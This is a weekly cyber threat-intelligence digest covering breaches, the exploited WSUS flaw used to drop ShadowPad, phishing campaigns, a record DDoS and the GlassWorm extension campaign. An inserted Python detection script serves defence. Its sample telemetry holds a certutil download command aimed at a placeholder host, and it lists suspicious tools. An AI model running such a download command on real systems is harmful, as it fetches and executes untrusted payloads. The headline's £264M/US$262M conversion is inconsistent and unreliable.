Telesoft | The Essential Weekly Cyber Security & Threat Intelligence Report: Exploits, Breaches & Fraud
10.12.2025

This week’s cyber landscape was dominated by large-scale data breaches, active exploitation of enterprise systems, sophisticated phishing campaigns, and unprecedented DDoS activity. Threat actors continue to blend zero-day exploitation, social engineering, and supply chain compromise to penetrate critical sectors including aviation, finance, higher education, advertising networks, and developer ecosystems.

For defenders, the message is clear: zero-day patching speed, supply chain visibility, and credential protection remain critical pillars of cyber resilience, while IoT botnets and developer tool impersonation show the growing industrialisation of cybercrime.


Iberia Confirms Data Breach Following Vendor Compromise

Category: Data Breach | Third-Party Risk | Aviation

Spain’s largest airline, Iberia, has confirmed a security incident tied to a third-party vendor breach. Exposed data includes customer names, email addresses, and loyalty card IDs. No payment information or passwords were compromised.
Iberia has implemented extra safeguards and notified authorities, but customers are warned to expect potential phishing attempts, especially loyalty-programme scams.

The incident follows a hacker’s claim to possess 77 GB of leaked Iberia data. Whether this data is linked to the vendor breach remains unconfirmed.


SOC & Threat Detection Note:
Vendor access monitoring, identity-based anomaly detection, and data access governance are essential to identify abnormal interactions originating from third-party systems.


FBI Warns Cybercriminals Stole £264M (US$262M) via Account Takeover Fraud

Category: Financial Fraud | Social Engineering | Identity Abuse

The FBI reports cybercriminals impersonating bank support teams stole more than $262 million this year through large-scale Account Takeover (ATO) attacks.
Attackers use fake calls, SMS messages, phishing emails, and spoofed bank websites to harvest usernames, passwords, and MFA codes. Once access is gained:

  • Accounts are hijacked
  • Passwords are changed
  • Funds are immediately wired to crypto wallets or mule accounts

The FBI urges strict MFA hygiene, unique passwords, and accessing bank sites via bookmarks rather than search results.


Threat Intelligence Impact:
ATO fraud continues to bypass MFA through real-time phishing kits and session-token theft. Organizations should deploy anomaly-based login detection and require phishing-resistant MFA.


Harvard University Discloses Voice-Phishing Data Breach

Category: Data Breach | Social Engineering | Higher Education

Harvard University confirmed it suffered a voice-phishing (vishing) attack, compromising data belonging to students, faculty, staff, and alumni donors. Exposed information includes:

  • Phone numbers
  • Email and physical addresses
  • Donor and fundraising records
  • Event activity
  • Biographical data

Official notifications were issued on November 22. Harvard is cooperating with law enforcement and external cybersecurity specialists.


Security Takeaway:
Vishing is rapidly increasing as attackers exploit human trust in authoritative callers. Continuous user education and call-verification policies are essential in high-value environments like universities and research institutions.


WSUS Vulnerability Actively Exploited to Deploy ShadowPad (CVE-2025-59287)

Category: Zero-Day Exploit | Nation-State Malware | Supply Chain Infrastructure

A critical deserialization flaw in Microsoft WSUS (CVE-2025-59287) is being actively exploited to deploy ShadowPad, a modular backdoor linked to nation-state actors.

Attack chain observed:

  1. Exploitation of exposed WSUS servers

  2. PowerCat used for remote shell access

  3. ShadowPad downloaded via certutil/curl

  4. ShadowPad activated using DLL sideloading

  5. Malware loads plugins into memory & achieves persistence

The vulnerability was patched last month, but weaponisation accelerated after a proof-of-concept exploit was published.

Impact:
Compromised WSUS servers enable stealthy distribution of malware across entire enterprise fleets.


SOC Insight:
Monitor for anomalous WSUS behaviour, unauthorized DLL loads, unexpected PowerShell execution, or unusual traffic from patch management servers.
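One way to turn the SOC Insight above into a concrete detection, as an added example that is not code from the Telesoft report: it flags shells and downloaders spawned directly by WSUS processes in process-creation telemetry. It assumes Sysmon Event ID 1-style fields (ParentImage, Image, CommandLine) and that WSUS code runs under WsusService.exe or the IIS worker w3wp.exe; the sample events are constructed and the host name in the download URL is a placeholder.

```python
from dataclasses import dataclass
from typing import Optional
import ntpath

# Assumption: WSUS code runs in WsusService.exe and the IIS worker w3wp.exe.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
# Children a patch server should rarely spawn: covers the PowerCat shell and
# the certutil/curl download stages described in the report.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe", "curl.exe"}
# Command-line fragments that point to a download rather than local admin use.
DOWNLOAD_HINTS = ("-urlcache", "http://", "https://")

@dataclass(frozen=True)
class Finding:
    host: str
    parent: str
    child: str
    reason: str

def evaluate_event(event: dict) -> Optional[Finding]:
    """Return a Finding when a WSUS process spawns a suspicious child."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    cmdline = event.get("CommandLine", "").lower()
    if parent not in WSUS_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return None
    reason = "wsus-spawned-shell"
    if any(hint in cmdline for hint in DOWNLOAD_HINTS):
        reason = "wsus-spawned-download"
    return Finding(event.get("Computer", "?"), parent, child, reason)

def scan(events) -> list:
    """Run evaluate_event over process-creation records and keep the hits."""
    return [f for f in map(evaluate_event, events) if f is not None]

# Constructed sample telemetry in a Sysmon Event ID 1-like shape (not real IoCs).
SAMPLE_EVENTS = [
    {"Computer": "wsus01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c powershell"},
    {"Computer": "wsus01", "ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://placeholder.invalid/p.dll p.dll"},
    {"Computer": "ws-07", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The same predicate maps directly onto a SIEM rule on parent/child image pairs; the workstation event is included to show that ordinary PowerShell use outside WSUS parents is not flagged.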


Fake “Calendly” Invites Used to Hijack Google & Meta Ad Manager Accounts

Category: Credential Theft | Phishing | Business Account Compromise

A campaign identified by Push Security uses fake "Calendly" scheduling invites impersonating major brands such as Mastercard, Disney, Unilever, and Uber.

Flow of attack:

  1. Victim receives realistic meeting invite

  2. Invite link leads to a spoofed scheduling page

  3. CAPTCHA screen adds legitimacy

  4. Fake login portal steals corporate credentials & session cookies

  5. Attackers gain access to Google/Meta Ad Manager accounts

  6. Ads are hijacked to run malicious or fraudulent campaigns


SOC Takeaway:
Ad platform credentials are high-value targets due to direct financial access. Session hijack detection and device-verification policies should be enforced.


Aisuru Botnet Launches Record-Breaking 29.7 Tbps DDoS Attack Against Cloudflare

Category: DDoS | IoT Botnet | Global Infrastructure

The Aisuru IoT botnet has delivered a staggering 29.7 Tbps DDoS attack, the largest recorded to date.
This attack far surpasses previous multi-terabit events and highlights Aisuru's rapid evolution.

Built from compromised IoT devices such as:

  • Routers
  • CCTV cameras
  • DVRs

…the botnet leverages global consumer hardware to generate massive traffic volumes.

Infrastructure Insight:
Large DDoS attacks continue to grow in scale due to insecure IoT ecosystems. Providers must adopt adaptive filtering, anycast distribution, and behavioural DDoS detection.


University of Phoenix Reports Breach Linked to Oracle E-Business Suite Zero-Day

Category: Zero-Day Exploit | Data Breach | Ransomware

The University of Phoenix confirmed a significant breach exploiting a zero-day in Oracle E-Business Suite, compromising:

  • Social Security numbers
  • Banking information
  • Personal data of students, staff & suppliers

The breach is linked to the Clop ransomware group, which has targeted multiple U.S. universities and corporations since August 2025, including Harvard, the University of Pennsylvania, Logitech, and The Washington Post.


Security Takeaway:
Higher education remains a prime target due to outdated ERP systems, legacy applications, and large volumes of sensitive data.


GlassWorm Resurfaces With 24 Malicious Developer Extensions

Category: Supply Chain Attack | Developer Ecosystem | C2 Innovation

The GlassWorm supply chain campaign has re-emerged, infiltrating the Microsoft Visual Studio Marketplace and Open VSX with 24 malicious extensions impersonating:

  • Flutter
  • React
  • Tailwind
  • Vim
  • Vue

GlassWorm characteristics:

  • Uses Solana blockchain for command-and-control
  • Deploys Rust-based implants on Windows & macOS
  • Retrieves JS payloads through encrypted channels
  • Can fall back to Google Calendar events for C2
  • Inflates extension download counts to appear legitimate
  • Harvests credentials for npm, GitHub, and Open VSX

This allows attackers to compromise downstream developer pipelines and spread malware through legitimate CI/CD operations.


Threat Intelligence Note:
Developer ecosystems remain a high-value point of infection due to the trust placed in extension marketplaces and the downstream reach of compromised packages.


Analyst Insight

This week emphasises the widening attack surface across enterprises, individuals, cloud services, and developer ecosystems. Key themes include:

1. Zero-Day Exploitation at Scale
  • Oracle E-Business Suite zero-day exploited in University of Phoenix breach
  • WSUS (CVE-2025-59287) actively exploited to deploy ShadowPad
2. Social Engineering Intensification
  • £264M stolen in ATO fraud
  • Harvard voice-phishing breach
  • Calendly impersonation campaign targeting high-value ad accounts
3. Supply Chain Attack Escalation
  • GlassWorm malware campaign targeting developer platforms
  • Iberia vendor-linked breach reinforces third-party exposure risks
4. Infrastructure Attacks Evolving
  • Aisuru botnet hits a record-breaking 29.7 Tbps DDoS attack

Defensive Priority:

Organizations must strengthen patch management, impose strict identity-based access controls, secure ad platform credentials, harden IoT-exposed assets, and deploy behavioural analytics across networks and cloud environments.
